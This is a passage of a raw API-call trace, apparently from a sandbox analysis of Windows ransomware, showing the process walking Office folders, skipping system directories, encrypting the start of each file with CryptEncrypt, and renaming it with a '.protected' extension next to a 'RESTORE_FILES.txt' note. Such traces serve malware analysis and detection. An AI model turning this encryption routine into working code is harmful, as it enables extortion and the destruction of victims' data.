[0069.628] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.628] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="Windows") returned -1 [0069.628] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="Program Files") returned -1 [0069.628] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.628] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.628] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll", lpString2="System Volume Information") returned -1 [0069.628] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll") returned 72 [0069.628] StrStrIW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0069.628] lstrcmpW (lpString1="MSOINTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.628] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.628] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.628] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0069.628] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll") returned 72 [0069.628] StrStrW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0069.628] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll") returned 72 
[0069.629] StrStrW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0069.629] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll") returned 72 [0069.629] StrStrW (lpFirst="MSOINTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0069.629] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.647] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.647] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.648] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.648] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.662] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.662] CloseHandle (hObject=0xd8) returned 1 [0069.662] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.protected") returned 82 [0069.662] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll"), 
lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.rest.trx_dll.protected")) returned 1 [0069.663] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.663] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0069.663] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="Program Files") returned -1 [0069.663] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.663] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.663] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0069.663] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll") returned 71 [0069.663] StrStrIW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0069.663] lstrcmpW (lpString1="OMSINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.663] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.663] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.663] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0069.664] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll") returned 71 
[0069.664] StrStrW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0069.664] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll") returned 71 [0069.664] StrStrW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0069.664] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll") returned 71 [0069.664] StrStrW (lpFirst="OMSINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0069.664] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.674] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.675] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.675] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.675] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.676] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.677] CloseHandle (hObject=0xd8) returned 1 [0069.677] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.protected") returned 81 [0069.677] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll.protected")) returned 1 [0069.678] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.678] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0069.678] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="Program Files") returned -1 [0069.678] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.678] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.678] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0069.678] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll") returned 70 [0069.678] StrStrIW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0069.678] lstrcmpW (lpString1="ONINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.678] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.678] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.678] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0069.679] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll") returned 70 [0069.679] StrStrW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0069.679] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll") returned 70 [0069.679] StrStrW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0069.679] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll") returned 70 [0069.679] StrStrW (lpFirst="ONINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0069.679] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.714] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.714] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.714] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.714] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.750] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.750] CloseHandle (hObject=0xd8) returned 1 [0069.751] wnsprintfW (in: 
pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.protected") returned 80 [0069.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.dll.trx_dll.protected")) returned 1 [0069.752] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.752] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="Windows") returned -1 [0069.752] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="Program Files") returned -1 [0069.752] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.752] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.752] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="System Volume Information") returned -1 [0069.752] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll") returned 71 [0069.752] StrStrIW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0069.752] lstrcmpW (lpString1="ONINTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.752] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.752] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.752] CreateFileW 
(lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0069.752] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll") returned 71 [0069.752] StrStrW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0069.752] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll") returned 71 [0069.752] StrStrW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0069.752] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll") returned 71 [0069.752] StrStrW (lpFirst="ONINTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0069.753] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.754] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.754] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.764] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.764] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.984] WriteFile (in: 
hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.984] CloseHandle (hObject=0xd8) returned 1 [0069.984] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.protected") returned 81 [0069.984] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ONINTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\onintl.rest.trx_dll.protected")) returned 1 [0069.985] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.985] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="Windows") returned -1 [0069.985] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="Program Files") returned -1 [0069.985] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.985] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.985] lstrcmpiW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0069.985] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll") returned 72 [0069.985] StrStrIW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0069.985] lstrcmpW (lpString1="OUTLLIBR.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.985] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.985] 
CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.985] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.028] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll") returned 72 [0070.074] StrStrW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.074] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll") returned 72 [0070.074] StrStrW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.074] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll") returned 72 [0070.074] StrStrW (lpFirst="OUTLLIBR.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.075] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.090] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.090] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.091] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.091] WriteFile (in: hFile=0xd8, 
lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.106] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.106] CloseHandle (hObject=0xd8) returned 1 [0070.107] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.protected") returned 82 [0070.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.dll.trx_dll.protected")) returned 1 [0070.108] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.108] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="Windows") returned -1 [0070.108] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="Program Files") returned -1 [0070.108] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0070.108] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.108] lstrcmpiW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="System Volume Information") returned -1 [0070.108] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll") returned 73 [0070.108] StrStrIW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".protected") returned 0x0 
[0070.108] lstrcmpW (lpString1="OUTLLIBR.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0070.108] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.108] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.108] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.108] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll") returned 73 [0070.108] StrStrW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".txt") returned 0x0 [0070.108] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll") returned 73 [0070.108] StrStrW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".rar") returned 0x0 [0070.108] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLLIBR.REST.trx_dll") returned 73 [0070.108] StrStrW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".zip") returned 0x0 [0070.108] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.127] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.127] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, 
